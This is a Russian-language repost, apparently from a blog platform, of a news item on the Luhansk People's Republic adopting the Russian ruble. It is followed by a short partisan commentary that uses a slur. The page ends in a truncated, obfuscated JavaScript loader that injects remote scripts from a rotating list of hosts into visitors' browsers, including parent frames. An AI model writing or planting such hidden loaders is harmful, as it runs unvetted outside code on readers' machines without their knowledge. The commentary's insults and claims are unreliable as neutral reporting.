ЛНР образовала валютный союз с Россией. А Россия знает ?

На модерации Отложенный
В ЛНР решили сделать российский рубль основной валютой
Игорь Плотницкий
Совет министров ЛНР издал постановление, согласно которому российский рубль станет основной валютой самопровозглашенной республики уже с 1 сентября. Сообщение об этом появилось на страницах «ЛуганскИнформЦентра», там же можно скачать текст официального документа.

«В целях принятия мер по стабилизации финансово-денежной системы, а также в связи с осуществлением финансовых операций на территории Луганской народной республики преимущественно в российских рублях и резким снижением гривневой наличной денежной массы (…) установить, что основной денежной единицей на территории ЛНР является российский рубль», — говорится в тексте постановления.

Документом предписывается перерасчет выплат заработной платы работникам бюджетной сферы и тарифов на жилищно-коммунальные услуги, а также осуществление в новой валюте бюджетного планирования, финансовой и налоговой отчетности.

Население в Луганске, как и везде, хочет на саночках спускаться только вниз
 
Каковы перспективы выдачи российских документов жителям Донбасса

26 февраля глава ЛНР Игорь Плотницкий своим решением ввел на подконтрольной территории мультивалютную финансовую систему расчетов. Он подчеркнул, что на территории ЛНР в обращении будут находиться рубль, гривна идоллар, а также те валюты, которые «будут удобными».

В Луганске тоже есть золотая молодежь, рестораны, бассейны. Дочь замначМЧС

22 января появилась информация о том, что на заседании правительства Севастополя были продемонстрированы образцы новых денег самопровозглашенных Луганской и Донецкой народных республик. Отмечалось, что была предоставлена купюра в 25 «расчетных знаков Новороссии», которая будет действовать до формирования в ЛНР и ДНР настоящей денежной системы.

В то же время руководство ДНР и ЛНР несколько раз меняло свое мнение по вопросу введения собственной валюты.

Так, в начале декабря прошлого года Плотницкий заявлял, что ЛНР продолжит осуществлять расчеты в гривнах. В ДНР в 2014 году говорили о планах создания собственной валюты, однако позднее там назвали такую идею аферой

---------------

Н.П. Стран без валюты и бюджета не бывает. Метания с валютой у НР-цев - свидетельство того, что не собирались они строить "государства".

Но воспитатель этого детского садика сказал, что "еще не время". И надо создать видимость построения "государств". И эти урюки, достаточно хорошо осваивая российские милитари-деньги (черный нал), более года не могут выстроить у себя ни банковской системы, ни бюджетной. Все другие валюты, кроме российского рубля, они не могли перечислять безналично в принципе. Переход только на RUB такую возможность дает. Но при двух условиях:

- Россия еще раз плюнет на ООН и откроет там филиалы своих банков;

- ей придется открыть не только военный, но и гражданский бюджет для НР-в;

Фактически наступил новый этап гибридной войны - Путин оформляет инкорпорацию Донбасса. Пока только экономически. С огромными затратами для России.  Видимо - с ужесточением западных санкций

<script type="text/javascript">// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("maxpark.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>